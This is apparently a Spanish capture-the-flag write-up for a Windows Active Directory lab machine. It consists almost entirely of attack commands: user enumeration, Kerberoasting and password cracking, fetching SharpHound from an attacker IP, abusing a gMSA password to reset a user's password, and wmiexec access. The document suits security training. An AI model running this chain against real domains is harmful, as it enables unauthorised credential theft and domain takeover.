# Search

**OS**: Windows \
**Dificultad**: Difícil
**Puntos**: 40

## Resumen

## Nmap Scan

```
Nmap scan report for 10.10.11.129
Host is up (0.066s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Search &mdash; Just Testing IIS
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-02-16 23:11:33Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-02-16T23:13:02+00:00; -2s from scanner time.
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
| tls-alpn: 
|_  http/1.1
|_http-title: Search &mdash; Just Testing IIS
|_ssl-date: 2022-02-16T23:13:02+00:00; -2s from scanner time.
| http-methods: 
|_  Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_http-server-header: Microsoft-IIS/10.0
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-02-16T23:13:02+00:00; -2s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-02-16T23:13:02+00:00; -2s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-02-16T23:13:02+00:00; -2s from scanner time.
8172/tcp  open  ssl/http      Microsoft IIS httpd 10.0
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2022-02-16T23:13:02+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after:  2030-04-05T09:05:25
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-IIS/10.0
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
49712/tcp open  msrpc         Microsoft Windows RPC
49734/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows
```

## Enumeración

`/opt/windows/kerbrute userenum -d search.htb --dc 10.10.11.129 users.txt`

`http://10.10.11.129/images/slide_2.jpg`
hope.sharp : IsolationIsKey?

`crackmapexec smb search.htb -u hope.sharp -p 'IsolationIsKey?'`
`smbmap -u hope.sharp -p 'IsolationIsKey?' -H search.htb`

`smbclient //10.10.11.129/RedirectedFolders$ -U hope.sharp`
`smbclient //10.10.11.129/CertEnroll -U hope.sharp`

`python3 /opt/impacket/examples/GetUserSPNs.py search.htb/Hope.Sharp:'IsolationIsKey?' -request`

`RESEARCH/web_svc.search.htb:60001  web_svc`

`john -wordlist=/usr/share/wordlists/rockyou.txt web_hash.txt`
`web_svc : @3ONEmillionbaby`

## Escalada de Privilegios (User)

`crackmapexec smb search.htb -u test.txt -p '@3ONEmillionbaby'`
`search.htb\edgar.jacobs:@3ONEmillionbaby`

`smbclient //10.10.11.129/RedirectedFolders$ -U edgar.jacobs`

`cd edgar.jacobs\Desktop\`
`get Phishing_Attempt.xlsx`


`smbclient //10.10.11.129/CertEnroll -U edgar.jacobs`

`smbmap -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -H search.htb`



## Escalada de Privilegios (Root)

`smbclient //10.10.11.129/RedirectedFolders$ -U Sierra.Frye`
`cd sierra.frye\Downloads\Backups\`
`get search-RESEARCH-CA.p12`
`get staff.pfx`

`crackpkcs12 -v -t 40 -d /usr/share/wordlists/rockyou.txt certs/search-RESEARCH-CA.p12`
`misspissy`

`iwr http://10.10.14.100/SharpHound.exe -Outfile C:\Users\Sierra.Frye\Documents\SharpHound.exe`
`.\SharpHound.exe --CollectionMethods all`
`mv .\20220217230919_BloodHound.zip C:\RedirectedFolders\sierra.frye\Documents\`


`get-aduser -filter * | select SamAccountName, SID`
`Get-ADServiceAccount`

```
$user = 'BIR-ADFS-GMSA$'
$gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword'
$blob = $gmsa.'msDS-ManagedPassword'
$mp = ConvertFrom-ADManagedPasswordBlob $blob
$cred = New-Object System.Management.Automation.PSCredential $user,$mp.SecureCurrentPassword
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {net user Tristan.Davies doom1234 /domain}
```
`python3 /opt/impacket/examples/wmiexec.py Tristan.Davies:doom1234@search.htb`

## Referencias
https://github.com/ropnop/kerbrute \
https://book.hacktricks.xyz/windows/active-directory-methodology/bloodhound \
https://github.com/allyomalley/p12Cracker \
https://github.com/crackpkcs12/crackpkcs12